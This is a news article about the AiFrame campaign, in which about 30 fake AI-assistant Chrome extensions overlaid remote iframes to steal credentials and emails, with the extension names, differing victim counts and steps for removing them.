More than 300,000 Chrome users have installed what looked like helpful AI add-ons that were actually data-stealing extensions, spread across roughly 30 fake tools. Anyone who has experimented with AI sidebars, ChatGPT helpers, or “Gemini” add-ons should open chrome://extensions/ and check their browser immediately. The campaign, documented by security researchers and backed by an official advisory, shows how convincingly attackers can abuse the AI boom to hijack everyday browsing.
The scheme, known as the AiFrame campaign, hijacks pages with a full-screen overlay that quietly captures what people type, including logins and email content. I will walk through what investigators uncovered, which extensions are implicated by name, how the data theft works, why the timing matters, and what practical steps can reduce the damage.
The AiFrame Campaign Unmasked
Security company LayerX identified a coordinated operation it calls the AiFrame campaign, involving 30 Chrome extensions that pretended to be AI assistants. According to LayerX, these extensions targeted at least 260,000 users, a figure the company ties directly to their install counts in the Chrome Web Store. The tools were marketed as productivity boosters that could summarize pages, translate content, or act as sidebars, but they all shared a hidden behavior that only appeared after installation.
LayerX’s technical breakdown describes how each extension contacted subdomains of the attacker-controlled tapnetic.pro domain, then injected a remote iframe into the victim’s browser. Once active, the iframe could take over the visible page and display a fake interface that looked like a normal website or AI assistant panel. To make that fake view convincing, the malicious code used Mozilla’s Readability library to extract and re-render the content of whatever page the user was visiting, so the overlay appeared seamless rather than obviously malicious.
Extensions to Delete Immediately
Media coverage of the campaign has focused on a group of high-profile fakes that reached large audiences before they were exposed. A report from Tom’s Guide cites “more than 300,000 users” affected and lists several extensions by name, including AI Sidebar, AI Assistant, ChatGPT Translate, AI GPT, and a Gemini AI Sidebar variant. These names were used to ride the popularity of well-known AI brands and features, making the add-ons look like legitimate companions for tools people already trusted.
A separate analysis by BleepingComputer repeats that the fake AI Chrome extensions reached 300,000 users and highlights the same families of tools, presenting them as part of a single coordinated campaign. LayerX, which first documented the AiFrame operation, pegs the number at 260,000 affected Chrome users, so there is a discrepancy between the technical and media counts. Regardless of whether the true figure is closer to 260,000 or 300,000, all three sources agree that the reach was large and that extensions branded as AI Sidebar, AI Assistant, ChatGPT Translate, AI GPT, and Gemini AI Sidebar are among those that users should remove.
How These Fakes Steal Your Data
The AiFrame extensions did not simply inject a small tracking pixel or banner. According to the LayerX technical report, they loaded a full-screen remote iframe from tapnetic.pro subdomains that effectively replaced the visible page with a lookalike version controlled by the attackers. Because the page content had been scraped using Mozilla’s Readability library, the malicious overlay could closely mimic the structure and text of the original site, making it hard for users to realize that they were no longer interacting with the genuine page.
LayerX explains that this remote UI allowed the attackers to intercept anything the user typed into the overlaid page, including credentials and email content. BleepingComputer, citing the same campaign, reports that the fake AI Chrome extensions were used to steal credentials and emails, confirming that sensitive data was a target. The exact volume of data exfiltrated is not publicly quantified, and none of the available sources provide a precise count of stolen accounts, but the technical design shows that any login or message entered while the iframe was active could have been captured.
Why This Matters Now
The AiFrame campaign arrives at a moment when AI-themed browser tools are rapidly multiplying and users are primed to install anything that promises quicker summaries or smarter sidebars. BleepingComputer reports that fake AI Chrome extensions with 300,000 users were stealing credentials and emails, which illustrates how attackers are exploiting that enthusiasm for AI branding. Tom’s Guide similarly frames the incident as a case where more than 300,000 Chrome users installed malicious extensions posing as AI assistants, reinforcing the scale of the problem.
At the same time, an official advisory from a university IT department underscores that this is not just an abstract security research story but an operational concern for real organizations. That advisory identifies specific malicious extension names and IDs and urges immediate removal via chrome://extensions/, effectively treating any AI-branded extension from the identified families as untrusted. For everyday users, the risk is straightforward: once an extension can impersonate the websites used for banking, email, or work tools, it can quietly siphon off data that is difficult to recover or fully revoke.
Steps to Protect Yourself
The official university advisory on Chrome security gives clear operational guidance that applies directly to the AiFrame case. It instructs users to open chrome://extensions/, review every installed item, and immediately remove any extension whose name or ID matches those flagged as malicious. That same advisory encourages users to disable unfamiliar add-ons even if they are not yet on a blocklist, a precaution that aligns with LayerX’s recommendation to treat AI-branded tools with caution when they request broad permissions or come from unknown developers.
LayerX’s write-up on the AiFrame extensions also suggests checking for signs of communication with tapnetic.pro subdomains, since that domain sits at the heart of the campaign’s remote iframe infrastructure. For non-technical users, that can mean running a reputable security scan or asking an IT team to review network logs rather than trying to parse connections manually. Enabling Chrome’s built-in Enhanced protection and limiting installations to extensions that have been vetted by an organization or appear in well-established collections can further reduce exposure, even though no single setting can fully eliminate the risk.
Broader Implications and Uncertainties
The AiFrame incident exposes how easily attackers can turn the browser extension model into a remote-control layer that sits between users and the web. Because the malicious AI assistants relied on full-screen iframes sourced from tapnetic.pro, they could adapt to any site a user visited, not just a single spoofed login page. That flexibility may encourage copycat campaigns that reuse the same technique with different branding, especially as AI-related keywords continue to drive clicks and installs.
There are still unresolved questions. LayerX’s primary report cites 260,000 affected Chrome users, while Tom’s Guide and BleepingComputer both describe 300,000 users or more, and none of the sources identify the attackers behind tapnetic.pro by name. The official university advisory focuses on removal and mitigation rather than attribution, which suggests that the priority for now is containment. Based on the evidence presented by LayerX and echoed in media coverage, I expect AI-branded scams like AiFrame to keep growing in sophistication, especially as long as users continue to grant powerful permissions to extensions that promise smarter browsing without verifying who is actually behind them.
More from Morning Overview
*This article was researched with the help of AI, with human editors creating the final content.